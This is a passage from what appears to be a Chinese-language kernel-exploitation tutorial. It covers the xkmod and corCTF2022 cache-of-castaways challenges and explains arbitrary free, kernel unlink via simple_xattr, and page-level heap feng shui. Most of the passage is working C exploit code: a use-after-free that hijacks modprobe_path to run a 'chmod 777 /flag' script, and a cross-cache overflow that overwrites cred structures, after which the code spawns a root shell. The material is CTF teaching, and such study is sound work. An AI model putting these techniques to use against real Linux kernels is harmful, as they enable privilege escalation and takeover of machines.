            } else {
                printf("                   ");
            }
        }

        printf("   ");

        /* ASCII column: non-printable bytes are shown as '.'. */
        for (int k = 0; k < 32 && k + row_off < len; k++) {
            uint8_t ch = bytes[row_off + k];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/*
 * Pin the calling process to a single CPU.
 *
 * core - index of the CPU to run on
 *
 * A failure is reported on stderr but is not fatal: the caller simply keeps
 * its previous affinity.
 */
void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) != 0) {
        perror("[-] sched_setaffinity");
    }
}

/*
 * Request passed to the xkmod ioctls (16 bytes on LP64).
 *
 * buf    - user-space buffer to copy from or to
 * offset - byte offset inside the kernel object
 * size   - number of bytes to transfer
 *
 * The standard uint32_t is used instead of the BSD-only u_int32_t; the
 * layout is unchanged.
 */
struct Data {
    size_t *buf;
    uint32_t offset;
    uint32_t size;
};

/* Issue ioctl 0x1111111 on fd with data as argument. The ioctl result is not checked. */
void alloc_buf(int fd, struct Data *data) {
    ioctl(fd, 0x1111111, data);
}

/* Issue ioctl 0x6666666 on fd with data as argument. The ioctl result is not checked. */
void write_buf(int fd, struct Data *data) {
    ioctl(fd, 0x6666666, data);
}

/* Issue ioctl 0x7777777 on fd with data as argument. The ioctl result is not checked. */
void read_buf(int fd, struct Data *data) {
    ioctl(fd, 0x7777777, data);
}

/*
 * xkmod exploit: turn the driver's dangling global pointer into two
 * arbitrary-address allocations, the first to leak the kernel base and the
 * second to overwrite modprobe_path.
 *
 * Returns 0 after the shell exits; exits with -1 on failure.
 */
int main() {
    bind_core(0);

    /* Several descriptors are opened up front: each close() triggers the
     * driver's release handler once. */
    int xkmod_fd[5];
    for (int i = 0; i < 5; i++) {
        xkmod_fd[i] = open("/dev/xkmod", O_RDONLY);
        if (xkmod_fd[i] < 0) {
            printf("[-] %d Failed to open xkmod.", i);
            exit(-1);
        }
    }

    struct Data data = {malloc(0x1000), 0, 0x50};
    if (data.buf == NULL) {
        puts("[-] Failed to allocate the transfer buffer.");
        exit(-1);
    }

    /* Allocate an object, then close one descriptor so it is freed while
     * the driver keeps using it. */
    alloc_buf(xkmod_fd[0], &data);
    close(xkmod_fd[0]);

    /* Read the freed object; its first qword is used as a heap address. */
    read_buf(xkmod_fd[1], &data);
    qword_dump("buf", data.buf, 0x50);

    size_t page_offset_base = data.buf[0] & 0xFFFFFFFFF0000000;
    /* %p requires a void *; passing a size_t directly is a format mismatch. */
    printf("[+] page_offset_base: %p\n", (void *) page_offset_base);

    /* Redirect the free list 0x10 bytes below page_offset_base + 0x9d000;
     * the second allocation then returns that address. */
    data.buf[0] = page_offset_base + 0x9d000 - 0x10;
    write_buf(xkmod_fd[1], &data);
    alloc_buf(xkmod_fd[1], &data);
    alloc_buf(xkmod_fd[1], &data);

    data.size = 0x50;
    read_buf(xkmod_fd[1], &data);
    qword_dump("buf", data.buf, 0x50);

    /* data.buf[2] is the qword at page_offset_base + 0x9d000. */
    size_t kernel_offset = data.buf[2] - 0xffffffff81000030;
    printf("kernel offset: %p\n", (void *) kernel_offset);
    modprobe_path += kernel_offset;

    /* Free the current object again and redirect the free list so that the
     * second allocation lands 0x10 bytes below modprobe_path. */
    close(xkmod_fd[1]);
    data.buf[0] = modprobe_path - 0x10;
    write_buf(xkmod_fd[2], &data);
    alloc_buf(xkmod_fd[2], &data);
    alloc_buf(xkmod_fd[2], &data);
    /* Offset 0x10 of the object is modprobe_path itself. */
    strcpy((char *) &data.buf[2], "/home/shell.sh");
    write_buf(xkmod_fd[2], &data);

    /* Create the helper script only if it cannot be opened already. */
    int script_fd = open("/home/shell.sh", O_RDWR);
    if (script_fd < 0) {
        system("echo '#!/bin/sh' >> /home/shell.sh");
        system("echo 'chmod 777 /flag' >> /home/shell.sh");
        system("chmod +x /home/shell.sh");
    } else {
        close(script_fd);
    }

    /* Executing a file with an unknown magic makes the kernel run the
     * program named by modprobe_path. */
    system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");
    system("chmod +x /home/fake");
    system("/home/fake");

    /* The script succeeded if /flag is now readable and writable. */
    int flag_fd = open("/flag", O_RDWR);
    if (flag_fd < 0) {
        puts("[-] Failed to hijack!");
        _exit(-1);
    }
    close(flag_fd);

    puts("[+] hijack success");
    system("/bin/sh");

    return 0;
}

Arbitrary Address Free（Only Heap Address）

在内核利用的时候，有时想通过修改 A 结构体的某个指针使其指向 B 结构体，然后释放 A 结构体来释放 B 结构体，从而实现 B 结构体的 UAF 。然而有时候用来劫持 B 结构体进行 UAF 的 C 结构体改不到 B 结构体的关键字段，这时候可以考虑把 A 结构体的指针改到 B 结构体地址减某个偏移的地方，这样 C 结构体的可控部分就能够覆盖 B 结构体需修改的区域。

分析 kfree 源码可知 kmem_cache 是通过 object 所在 page 获取的。

void kfree(const void *x)
{
	struct page *page;
	void *object = (void *)x;

	trace_kfree(_RET_IP_, x);

	if (unlikely(ZERO_OR_NULL_PTR(x)))
		return;

	page = virt_to_head_page(x);
	if (unlikely(!PageSlab(page))) {
		BUG_ON(!PageCompound(page));
		kfree_hook(object);
		__free_pages(page, compound_order(page));
		return;
	}
	slab_free(page->slab_cache, page, object, NULL, 1, _RET_IP_);
}

之后有如下调用链：

kfree()
    slab_free()
        do_slab_free()

在 do_slab_free 中几乎没做检查，直接将该 object 链入到 freelist 上。因此可以进行堆上任意地址 free 。

if (likely(page == c->page)) {
	set_freepointer(s, tail_obj, c->freelist);

	if (unlikely(!this_cpu_cmpxchg_double(
			s->cpu_slab->freelist, s->cpu_slab->tid,
			c->freelist, tid,
			head, next_tid(tid)))) {

		note_cmpxchg_failure("slab_free", s, tid);
		goto redo;
	}
	stat(s, FREE_FASTPATH);
}

Kernel Unlink

区别于用户态的 unlink 攻击，kernel unlink 主要作用是借助 unlink 的指针互写操作来实现任意地址写数据。

unlink 基于 list_del 操作。伪造两个地址来替代 list_head ，这样其中一个地址就会被写到另一个地址上。如果我们能够控制 prev / next 指针，可以把 prev 指针设置为 modprobe_path ，这样就会在 [2] 处将 next 值写入 prev 指向的内存。

问题：[1] 处，prev 会写往 next->prev，这意味着 next 也必须是一个有效的指针，这限制了我们能在 [2] 处写入的值（即 next）。解决办法是，利用 physmap 提供一个有效的 next 值。

static inline void __list_del(struct list_head * prev, struct list_head * next)
{
	next->prev = prev; 				// [1]
	WRITE_ONCE(prev->next, next); 	// [2]
}

physmap 是一块内核虚拟内存，物理内存页连续映射到该处。例如，如果机器有 4G 内存（2^32 字节），需用 32 bit 来索引物理内存；假设 physmap 起始地址是 0xffffffff00000000，则 0xffffffff00000000~0xffffffffffffffff 范围内的值都有效。因此，若系统有 4G 内存（实际要求一般比这个低很多），攻击者可以控制 next 的低 4 字节，只要高 4 字节表示 physmap 地址即可。

由于我们目标是修改 modprobe_path ，可以构造 next = 0xffffxxxx2f706d74（低 4 字节按小端序即字符串 "tmp/"；由于 [1] 处还要写 next->prev，系统内存至少要有 0x2f706d7c 字节，大概 760M），若 prev = modprobe_path + 1，利用 [2] 将 modprobe_path 覆写为 /tmp/xxxxprobe （其中 xxxx 是 next 的高 4 字节）。后面即可提权。

1	removexattr("suffix name", XATTR_DELETION_NAME)

simple_xattr

以 simple_xattr 结构体为例（所有有链表解链操作的结构体都可以），该结构体定义如下，可以看到该结构体中有一个 list 成员。

struct simple_xattr {
    struct list_head list;
    char *name;
    size_t size;
    char value[];
};

struct list_head {
	struct list_head *next, *prev;
};

因此我们可以修改 simple_xattr 来实现 unlink 攻击。但是该技术需要知道哪个 simple_xattr 对象被覆盖了，否则随意移除 item 会导致遍历 list 时报错（如果移除的正常的 simple_xattr 与异常的 simple_xattr 相邻会将异常的 simple_xattr 链入双向链表中）。

识别被覆盖的 simple_xattr 对象有如下方法：

如果修改 simple_xattr 的同时我们还能够读取 simple_xattr 那么我们可以在创建 simple_xattr 时通过设置 value 的值（setxattr 的 value 参数）来确定被覆盖的 simple_xattr 对象。
可以分配长度 0x100 字节的 name（setxattr 的 name 参数）那么 simple_xattr ->name 指针的最低 1 字节为 0 。此时我们在覆盖 simple_xattr 的 list_head 的同时还顺便将 simple_xattr ->name 的最低 1 字节覆盖使得 name 指向原来 name 中间某个位置，这样我们就能确定被覆盖的 simple_xattr 对应的 name 。

Page-level Heap Fengshui

Cross-Cache Overflow 实际上是针对 buddy system 的利用手法。

当 freelist page 已经耗空且 partial 链表也为空时（或者 kmem_cache 刚刚创建后进行第一次分配时），其会向 buddy system 申请页面：

buddy system 基本原理就是以 2 的 order 次幂张内存页作为分配粒度，相同 order 间空闲页面构成双向链表，当低阶 order 的页面不够用时便会从高阶 order 取一份连续内存页拆成两半，其中一半挂回当前请求 order 链表，另一半返还给上层调用者；下图为以 order 2 为例的 buddy system 页面分配基本原理：

我们不难想到的是：从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的，由此我们可以：

向 buddy system 请求两份连续的内存页
释放其中一份内存页，在 vulnerable kmem_cache 上堆喷，让其取走这份内存页
释放另一份内存页，在 victim kmem_cache 上堆喷，让其取走这份内存页

此时我们便有可能溢出到其他的内核结构体上，从而完成 cross-cache overflow

注意 slub 申请的 object 位于线性映射区，因此溢出修改的是物理地址相邻的内存页。而 buddy system 的特性可以保证两个物理页物理地址相邻。

在实际情况中我们无法准确控制 buddy system ，因此这一步骤改为：

向 buddy system 请求大量的内存页
释放其中一半内存页，在 vulnerable kmem_cache 上堆喷，让其取走这些内存页
释放另一半内存页，在 victim kmem_cache 上堆喷，让其取走这些内存页

这样我们有很大概率构造出上面那种情况，从而可以溢出到其他的内核结构体上完成 cross-cache overflow 。

例题：corCTF2022 - cache-of-castaways

附件下载链接
init_module 创建了一个 kmem_cache，分配的 object 的 size 为 512，创建 flag 为 SLAB_ACCOUNT | SLAB_PANIC，同时开启了 CONFIG_MEMCG_KMEM=y，这意味着这是一个**独立的 kmem_cache**：

/*
 * Decompiled module init: registers the "castaway" misc device, allocates
 * the castaway_arr pointer table and creates the dedicated 512-byte object
 * cache "castaway_cache" (flags 0x4040000).
 */
void init_module()
{
  castaway_dev = 0xFF;
  qword_8A8 = (__int64)"castaway";
  qword_8B0 = (__int64)&castaway_fops;
  _mutex_init(&castaway_lock, "&castaway_lock", &_key_28999);
  if ( !(unsigned int)misc_register(&castaway_dev) )
  {
    /* Pointer table comes from a general-purpose kmalloc cache (index 12). */
    castaway_arr = (char **)kmem_cache_alloc(kmalloc_caches[12], 0xDC0LL);
    if ( castaway_arr )
    {
      castaway_cachep = kmem_cache_create("castaway_cache", 512LL, 1LL, 0x4040000LL, 0LL);
      if ( castaway_cachep )
        init_castaway_driver_cold();
    }
  }
}

castaway_edit 存在 6 字节溢出。

/*
 * Decompiled edit handler: copies up to 0x200 user bytes into a stack
 * buffer and then into the selected object.
 *
 * The request is rejected (cold path) when index > 0x18F, the slot is
 * empty, size > 0x200, or the copy from user space fails.
 *
 * The final memcpy starts 6 bytes into the object, so a full-size request
 * (0x200 bytes) writes 6 bytes past the end of the 512-byte object.
 */
void __fastcall castaway_edit(unsigned __int64 index, size_t size, __int64 buf)
{
  char src[512]; // [rsp+0h] [rbp-220h] BYREF
  unsigned __int64 v5; // [rsp+200h] [rbp-20h]

  v5 = __readgsqword(0x28u);
  if ( index > 0x18F
    || !castaway_arr[index]
    || size > 0x200
    || (_check_object_size(src, size, 0LL), copy_from_user(src, buf, size)) )
  {
    castaway_edit_cold();
  }
  else
  {
    /* destination is object + 6: bytes [6, 6 + size) are written */
    memcpy(castaway_arr[index] + 6, src, size);
  }
}

由于该 kmem_cache 是独立的，object 级别的利用不可用，因此考虑页级堆风水。

首先向 buddy system 请求大量的内存页。

/* make buddy's lower order clean, castaway_requesting from higher */
puts("[*] spraying pgv pages...");
for (int i = 0; i < PGV_PAGE_NUM; i++) {
    if (alloc_page(i, getpagesize(), 1) < 0) {
        printf("[x] failed at no.%d socket\n", i);
        err_exit("FAILED to spray pages via socket!");
    }
}

释放其中一半内存页，在 cred_jar 上堆喷，让其取走这些内存页。

/* free pages for cred */
puts("[*] freeing for cred pages...");
for (int i = 1; i < PGV_PAGE_NUM; i += 2) {
    free_page(i);
}

/* spray cred to get the isolate pages we released before */
puts("[*] spraying cred...");
pipe(check_root_pipe);
for (int i = 0; i < CRED_SPRAY_NUM; i++) {
    if (simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND, waiting_for_root_fn) < 0) {
        printf("[x] failed at cloning %d child\n", i);
        err_exit("FAILED to clone()!");
    }
}

由于 fork() 在执行过程中会产生很多的”噪声“（即额外分配一些我们不需要的结构体，从而影响页布局），因此这里我们改用 clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND) 。

下面的代码相当于 fork 了一个进程执行 waiting_for_root_fn 函数。

char child_pipe_buf[1];
int check_root_pipe[2];
char bin_sh_str[] = "/bin/sh";
char *shell_args[] = {bin_sh_str, NULL};
struct timespec timer = {
        .tv_sec = 100000000,
        .tv_nsec = 0,
};

/*
 * Body of every sprayed child: block on the notification pipe, then check
 * whether this task's credentials were overwritten.
 *
 *   read(check_root_pipe[0], child_pipe_buf, 1)   - wait for the parent
 *   getuid() == 0 ? execve("/bin/sh", shell_args, NULL)
 *                 : nanosleep(&timer, NULL)
 *
 * Written as raw syscalls in Intel-syntax assembly because all children
 * share one stack (see the comment below), so no C code that relies on the
 * stack may run here. Symbols are referenced by absolute address.
 *
 * The read buffer is loaded with `lea`: in GAS Intel syntax a bare symbol
 * operand (`mov rsi, child_pipe_buf`) is a memory load of the symbol's
 * contents, not its address, which would hand read() a bogus pointer.
 */
int waiting_for_root_fn(void *args) {
    /* we're using the same stack for them, so we need to avoid cracking it.. */
    __asm__ volatile (
            "   lea rax, [check_root_pipe]; "
            "   mov edi, dword ptr [rax]; "     /* fd = check_root_pipe[0] */
            "   lea rsi, [child_pipe_buf]; "    /* buf = &child_pipe_buf[0] */
            "   mov edx, 1;   "
            "   xor eax, eax; " /* read(check_root_pipe[0], child_pipe_buf, 1)*/
            "   syscall;      "
            "   mov eax, 102; " /* getuid() */
            "   syscall; "
            "   cmp eax, 0; "
            "   jne failed; "
            "   lea rdi, [bin_sh_str];  "
            "   lea rsi, [shell_args];  "
            "   xor edx, edx;   "
            "   mov eax, 59;    "
            "   syscall;        "   /* execve("/bin/sh", args, NULL) */
            "failed: "
            "   lea rdi, [timer]; "
            "   xor esi, esi; "
            "   mov eax, 35; "  /* nanosleep() */
            "   syscall; "
            );

    return 0;
}

/*
 * Minimal clone(2) wrapper written as a naked function (the body is only
 * the assembly below).
 *
 * flags - clone flags, passed through unchanged in rdi
 * fn    - entry point the child jumps to
 *
 * The raw syscall is issued with the stack argument and all remaining
 * arguments set to zero. In the parent the syscall result is returned in
 * rax; in the child (result 0) control jumps to fn and never returns here.
 */
__attribute__((naked)) long simple_clone(int flags, int (*fn)(void *)) {
    /* for syscall, it's clone(flags, stack, ...) */
    __asm__ volatile (
            " mov r15, rsi; "   /* keep fn in r15; rsi is reused as an argument */
            " xor esi, esi; "   /* stack = NULL, remaining arguments = 0 */
            " xor edx, edx; "
            " xor r10d, r10d; "
            " xor r8d, r8d;   "
            " xor r9d, r9d;   "
            " mov eax, 56;  "   /* __NR_clone */
            " syscall;      "
            " cmp eax, 0;   "
            " je child_fn;  "
            " ret;          "   /* parent */
            "child_fn:      "
            " jmp r15;      "   /* child */
            );
}

释放另一半内存页，在 castaway_cache 上堆喷，让其取走这些内存页，并且对每个申请的 object 溢出试图跨页溢出修改 cred 。

/* free pages for our vulerable objects */
puts("[*] freeing for vulnerable pages...");
for (int i = 0; i < PGV_PAGE_NUM; i += 2) {
    free_page(i);
}

/* spray vulnerable objects, hope that we can make an oob-write to cred */
puts("[*] trigerring vulnerability in castaway kernel module...");
memset(buf, 0, sizeof(buf));
*(uint32_t *) &buf[VUL_OBJ_SIZE - 6] = 1;    /* cred->usage */
for (int i = 0; i < VUL_OBJ_NUM; i++) {
    alloc();
    edit(i, VUL_OBJ_SIZE, buf);
}

最后解除 waiting_for_root_fn 的阻塞，使其检查进程权限。如果进程已被提权至 root 则返回 shell 。

/* checking privilege in child processes */
puts("[*] notifying child processes and waiting...");
write(check_root_pipe[1], buf, CRED_SPRAY_NUM);

本题借助 setsockopt() 完成页级堆风水，相关原理在 kernel pwn 常用结构体总结中进行介绍。

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <sched.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>

#define PGV_CRED_START (PGV_PAGE_NUM / 2)
#define CRED_SPRAY_NUM 514
#define VUL_OBJ_NUM 400
#define VUL_OBJ_SIZE 512
#define VUL_OBJ_PER_SLUB 8
#define VUL_OBJ_SLUB_NUM (VUL_OBJ_NUM / VUL_OBJ_PER_SLUB)

struct castaway_request {
    int64_t index;
    size_t size;
    void *buf;
};

int dev_fd;

/*
 * Print msg as a bold red "[x] Error: ..." line on stdout and terminate the
 * process with EXIT_FAILURE. Does not return.
 */
void err_exit(char *msg) {
    printf("\033[31m\033[1m[x] Error: %s\033[0m\n", msg);
    exit(EXIT_FAILURE);
}

/*
 * Issue ioctl 0xCAFEBABE on the castaway device (dev_fd) without an
 * argument. The ioctl result is not checked.
 */
void alloc(void) {
    ioctl(dev_fd, 0xCAFEBABE);
}

void edit(int64_t index, size_t size, void *buf) {
    struct castaway_request r = {
            .index = index,
            .size = size,
            .buf = buf
    };
    ioctl(dev_fd, 0xF00DBABE, &r);
}

char child_pipe_buf[1];
int check_root_pipe[2];
char bin_sh_str[] = "/bin/sh";
char *shell_args[] = {bin_sh_str, NULL};
struct timespec timer = {
        .tv_sec = 100000000,
        .tv_nsec = 0,
};

/*
 * Body of every sprayed child: block on the notification pipe, then check
 * whether this task's credentials were overwritten.
 *
 *   read(check_root_pipe[0], child_pipe_buf, 1)   - wait for the parent
 *   getuid() == 0 ? execve("/bin/sh", shell_args, NULL)
 *                 : nanosleep(&timer, NULL)
 *
 * Written as raw syscalls in Intel-syntax assembly because all children
 * share one stack (see the comment below), so no C code that relies on the
 * stack may run here. Symbols are referenced by absolute address.
 *
 * The read buffer is loaded with `lea`: in GAS Intel syntax a bare symbol
 * operand (`mov rsi, child_pipe_buf`) is a memory load of the symbol's
 * contents, not its address, which would hand read() a bogus pointer.
 */
int waiting_for_root_fn(void *args) {
    /* we're using the same stack for them, so we need to avoid cracking it.. */
    __asm__ volatile (
            "   lea rax, [check_root_pipe]; "
            "   mov edi, dword ptr [rax]; "     /* fd = check_root_pipe[0] */
            "   lea rsi, [child_pipe_buf]; "    /* buf = &child_pipe_buf[0] */
            "   mov edx, 1;   "
            "   xor eax, eax; " /* read(check_root_pipe[0], child_pipe_buf, 1)*/
            "   syscall;      "
            "   mov eax, 102; " /* getuid() */
            "   syscall; "
            "   cmp eax, 0; "
            "   jne failed; "
            "   lea rdi, [bin_sh_str];  "
            "   lea rsi, [shell_args];  "
            "   xor edx, edx;   "
            "   mov eax, 59;    "
            "   syscall;        "   /* execve("/bin/sh", args, NULL) */
            "failed: "
            "   lea rdi, [timer]; "
            "   xor esi, esi; "
            "   mov eax, 35; "  /* nanosleep() */
            "   syscall; "
            );

    return 0;
}

/*
 * Minimal clone(2) wrapper written as a naked function (the body is only
 * the assembly below).
 *
 * flags - clone flags, passed through unchanged in rdi
 * fn    - entry point the child jumps to
 *
 * The raw syscall is issued with the stack argument and all remaining
 * arguments set to zero. In the parent the syscall result is returned in
 * rax; in the child (result 0) control jumps to fn and never returns here.
 */
__attribute__((naked)) long simple_clone(int flags, int (*fn)(void *)) {
    /* for syscall, it's clone(flags, stack, ...) */
    __asm__ volatile (
            " mov r15, rsi; "   /* keep fn in r15; rsi is reused as an argument */
            " xor esi, esi; "   /* stack = NULL, remaining arguments = 0 */
            " xor edx, edx; "
            " xor r10d, r10d; "
            " xor r8d, r8d;   "
            " xor r9d, r9d;   "
            " mov eax, 56;  "   /* __NR_clone */
            " syscall;      "
            " cmp eax, 0;   "
            " je child_fn;  "
            " ret;          "   /* parent */
            "child_fn:      "
            " jmp r15;      "   /* child */
            );
}

/* Best-effort write of text to a /proc file; failures are reported, not fatal. */
static void unshare_write_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY);

    if (fd < 0) {
        perror(path);
        return;
    }
    if (write(fd, text, strlen(text)) < 0) {
        perror(path);
    }
    close(fd);
}

/**
 * @brief create an isolate namespace
 * note that the caller **SHOULD NOT** be used to get the root, but an operator
 * to perform basic exploiting operations in it only
 *
 * Moves the caller into new mount, user and network namespaces and maps its
 * original uid/gid to 0 inside the new user namespace.
 *
 * The ids are sampled BEFORE unshare(): once inside a user namespace that
 * has no mapping yet, getuid()/getgid() return the overflow id rather than
 * the real one, so sampling afterwards would write a wrong map line.
 *
 * Every step is best-effort: errors are printed and setup continues.
 */
void unshare_setup(void) {
    char map_line[0x100];
    const uid_t outer_uid = getuid();
    const gid_t outer_gid = getgid();

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        perror("[x] unshare");
    }

    /* setgroups is denied before gid_map is written. */
    unshare_write_file("/proc/self/setgroups", "deny");

    snprintf(map_line, sizeof(map_line), "0 %d 1", (int) outer_uid);
    unshare_write_file("/proc/self/uid_map", map_line);

    snprintf(map_line, sizeof(map_line), "0 %d 1", (int) outer_gid);
    unshare_write_file("/proc/self/gid_map", map_line);
}

#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

/* operations type */
enum {
    CMD_ALLOC_PAGE,
    CMD_FREE_PAGE,
    CMD_EXIT,
};

/* tpacket version for setsockopt */
enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr) {
    struct tpacket_req req;
    int socket_fd, version;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        ret = socket_fd;
        goto err_out;
    }

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                     &version, sizeof(version));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_VERSION)\n");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
        goto err_setsockopt;
    }

    return socket_fd;

    err_setsockopt:
    close(socket_fd);
    err_out:
    return ret;
}

/*
 * Called by the parent: ask the spray child to allocate pages for slot idx.
 *
 * idx  - slot in the child's socket table
 * size - block size in bytes
 * nr   - number of blocks
 *
 * Sends a CMD_ALLOC_PAGE request over cmd_pipe_req and waits for the reply
 * on cmd_pipe_reply. Returns the child's result, or -1 when the request
 * could not be sent or no complete reply was received (previously an
 * uninitialised value was returned in that case).
 */
int alloc_page(int idx, unsigned int size, unsigned int nr) {
    struct pgv_page_request req = {
            .idx = idx,
            .cmd = CMD_ALLOC_PAGE,
            .size = size,
            .nr = nr,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request)) != (ssize_t) sizeof(req)) {
        return -1;
    }
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
        return -1;
    }

    return ret;
}

/*
 * Called by the parent: ask the spray child to release the pages of slot idx.
 *
 * Sends a CMD_FREE_PAGE request over cmd_pipe_req and waits for the reply on
 * cmd_pipe_reply. Returns the child's result, or -1 when the request could
 * not be sent or no complete reply was received (previously an uninitialised
 * value was returned in that case).
 */
int free_page(int idx) {
    struct pgv_page_request req = {
            .idx = idx,
            .cmd = CMD_FREE_PAGE,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t) sizeof(req)) {
        return -1;
    }
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
        return -1;
    }

    return ret;
}

/*
 * Command loop of the spray child.
 *
 * Enters an isolated namespace, then serves requests from cmd_pipe_req until
 * CMD_EXIT arrives or the pipe can no longer be read:
 *   CMD_ALLOC_PAGE - create a packet socket with a ring for slot req.idx
 *   CMD_FREE_PAGE  - close the socket stored in slot req.idx
 *   CMD_EXIT       - acknowledge with 0 and leave the loop
 * One int reply is written to cmd_pipe_reply per request; -1 is sent for an
 * unknown command or an out-of-range slot.
 */
void spray_cmd_handler(void) {
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* Unused slots hold -1 so that freeing one fails cleanly in close(). */
    for (int i = 0; i < PGV_PAGE_NUM; i++) {
        socket_fd[i] = -1;
    }

    /* create an isolate namespace*/
    unshare_setup();

    /* handler request */
    do {
        if (read(cmd_pipe_req[0], &req, sizeof(req)) != (ssize_t) sizeof(req)) {
            /* Pipe closed or broken: nothing more to serve. */
            break;
        }

        ret = -1;
        if (req.cmd == CMD_ALLOC_PAGE || req.cmd == CMD_FREE_PAGE) {
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid page index: %d\n", req.idx);
            } else if (req.cmd == CMD_ALLOC_PAGE) {
                ret = create_socket_and_alloc_pages(req.size, req.nr);
                socket_fd[req.idx] = ret;
            } else {
                ret = close(socket_fd[req.idx]);
                socket_fd[req.idx] = -1;
            }
        } else if (req.cmd == CMD_EXIT) {
            ret = 0;
        } else {
            printf("[x] invalid request: %d\n", req.cmd);
        }

        if (write(cmd_pipe_reply[1], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
            break;
        }
    } while (req.cmd != CMD_EXIT);
}

/*
 * Initialise the page-spray subsystem: create the request/reply pipes and
 * fork the child that serves allocation commands.
 *
 * Terminates the process via err_exit() if a pipe or the child cannot be
 * created. The child never returns from this function: should its command
 * loop end, it exits instead of continuing with the parent's code.
 */
void prepare_pgv_system(void) {
    /* pipe for pgv */
    if (pipe(cmd_pipe_req) < 0 || pipe(cmd_pipe_reply) < 0) {
        err_exit("FAILED to create pgv command pipes!");
    }

    /* child process for pages spray */
    pid_t child = fork();
    if (child < 0) {
        err_exit("FAILED to fork pgv spray helper!");
    }
    if (child == 0) {
        spray_cmd_handler();
        _exit(EXIT_SUCCESS);
    }
}

/*
 * Pin the calling process to a single CPU.
 *
 * core - index of the CPU to run on
 *
 * A failure is reported on stderr but is not fatal: the caller simply keeps
 * its previous affinity.
 */
void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) != 0) {
        perror("[-] sched_setaffinity");
    }
}

/*
 * castaway exploit: page-level heap shaping followed by a cross-page
 * overflow from the driver's objects into sprayed credentials.
 *
 * Phases:
 *   1. spray PGV_PAGE_NUM single-page allocations through the helper child
 *   2. free the odd slots and spray child tasks, hoping their creds take
 *      those pages
 *   3. free the even slots and spray driver objects, overflowing each one
 *   4. wake every child so it can test whether it became root
 */
int main() {
    char buf[0x1000];

    bind_core(0);

    dev_fd = open("/dev/castaway", O_RDWR);
    if (dev_fd < 0) {
        err_exit("FAILED to open castaway device!");
    }

    prepare_pgv_system();

    /* make buddy's lower order clean, castaway_requesting from higher */
    puts("[*] spraying pgv pages...");
    for (int i = 0; i < PGV_PAGE_NUM; i++) {
        if (alloc_page(i, getpagesize(), 1) < 0) {
            printf("[x] failed at no.%d socket\n", i);
            err_exit("FAILED to spray pages via socket!");
        }
    }

    /* free pages for cred */
    puts("[*] freeing for cred pages...");
    for (int i = 1; i < PGV_PAGE_NUM; i += 2) {
        free_page(i);
    }

    /* spray cred to get the isolate pages we released before */
    puts("[*] spraying cred...");
    pipe(check_root_pipe);
    for (int i = 0; i < CRED_SPRAY_NUM; i++) {
        if (simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND, waiting_for_root_fn) < 0) {
            printf("[x] failed at cloning %d child\n", i);
            err_exit("FAILED to clone()!");
        }
    }

    /* free pages for our vulerable objects */
    puts("[*] freeing for vulnerable pages...");
    for (int i = 0; i < PGV_PAGE_NUM; i += 2) {
        free_page(i);
    }

    /* spray vulnerable objects, hope that we can make an oob-write to cred */
    puts("[*] trigerring vulnerability in castaway kernel module...");
    memset(buf, 0, sizeof(buf));
    /*
     * The payload's last 6 bytes are the ones that spill past the object.
     * The first 4 of them are set to 1 (cred->usage); the 2 after stay zero.
     * memcpy is used because buf + VUL_OBJ_SIZE - 6 is not 4-byte aligned
     * and buf is a char array, so a store through uint32_t * is not valid C.
     */
    const uint32_t cred_usage = 1;
    memcpy(&buf[VUL_OBJ_SIZE - 6], &cred_usage, sizeof(cred_usage));
    for (int i = 0; i < VUL_OBJ_NUM; i++) {
